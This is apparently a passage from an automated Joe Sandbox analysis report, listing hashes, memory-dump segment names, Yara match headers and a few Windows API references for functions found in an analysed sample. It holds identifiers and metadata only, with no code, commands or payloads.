                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c0df5a753b16485c332354394debab2f85f636146782f0c13e9c505dfb427b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 770129FB24D118ADB150B5852B18AF66A6DE6E37343334F2FF843C1502B284694D2172
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2163389717.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4880000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2e6d0762ae304b3bd3f1ce38436ff81d17d0c4c505625fee4c0544309ad2e3b2
                                                                                                                                                                                                                                              • Instruction ID: 556feb511e223f0884ac1c9c07ff234b41fe0dff346967071273ecbde1cf8b1a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e6d0762ae304b3bd3f1ce38436ff81d17d0c4c505625fee4c0544309ad2e3b2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37012BF724D019ADB251F5982F50AFE6758EAE33347324F2EF446C7102D249765E2172
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2163389717.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4880000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 28095c578cf2eee5fec420754f27cc7047577e4f36c36e4851fea349c0bd728a
                                                                                                                                                                                                                                              • Instruction ID: 552381101ce8ed2eb2e481d8fac64c50d896920a02238c8a12a1dc8008b5b269
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28095c578cf2eee5fec420754f27cc7047577e4f36c36e4851fea349c0bd728a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 010184B720D155ADB250A5953A50ABA6768D6D37347328F2EF482C2002E284655D6132
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2163389717.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4880000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ef09b45349ae3b4ee2bc84a34aa16633249b675c325b90f3cc1f1646bb80c745
                                                                                                                                                                                                                                              • Instruction ID: ceb712a41498fbcd24b7fa99cbc4b82cbd459b7e22ea77391f62941a0a4a2dbf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef09b45349ae3b4ee2bc84a34aa16633249b675c325b90f3cc1f1646bb80c745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36F05CB720C1088DE760F1C53B40B3A36909AC76387734F2FF486C7000D215755D7522
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2163389717.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4880000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 885a6286ea17d013ab847b70b1c6fdf1cc869b88505e0377abc025ed03e5a781
                                                                                                                                                                                                                                              • Instruction ID: 09e77ae4f650d9ef70c87e1b0ebed0835a1c2672a105707a0b8fe5c5cdf32dff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 885a6286ea17d013ab847b70b1c6fdf1cc869b88505e0377abc025ed03e5a781
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F027772181099DEA90B6852A4063A27509A9723C3324F1FE481C3002D214746D6622
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                              • Opcode ID: a0bf63fefdc59223b2cf3476f646fc85e00eeb532294bef361edc9cc4dac57bc
                                                                                                                                                                                                                                              • Instruction ID: a5773ba8d79a45effd26d09768e960c05c4b802a850635d13618c59e38b979a4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0bf63fefdc59223b2cf3476f646fc85e00eeb532294bef361edc9cc4dac57bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BC25D72E086298FDF25EE28DD407EAB3B5EB44714F1441EAD84DE7250E778AE819F40
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 00F4E10B
                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000008,00000000), ref: 00F4E140
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                                              • Opcode ID: 2bb29aa82919f4cf1a81cfef5d26db02691e961d0fad22bfd721d80a65572fd8
                                                                                                                                                                                                                                              • Instruction ID: b43f5bf8e90dbfea1f259213c3634d242421e743ea808debb3d7c15c020acb5d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bb29aa82919f4cf1a81cfef5d26db02691e961d0fad22bfd721d80a65572fd8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0531E4B2E442489FD724CB6CCC81BAB7BBCFB09734F040625ED15E7291DA74A8459BA0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                              • Instruction ID: 21b49bc8221d4ae5e8bb76a0e9335aaabe466c5cf3bfbc31522ecd8216f09314
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF15E71E002199FDF14DFA8C8846EDBBB1FF48724F25826AD919AB355D730AE01DB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimePreciseAsFileTime.KERNEL32(?,00F5CF52,?,00000003,00000003,?,00F5CF87,?,?,?,00000003,00000003,?,00F5C4FD,00F42FB9,00000001), ref: 00F5CC03
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
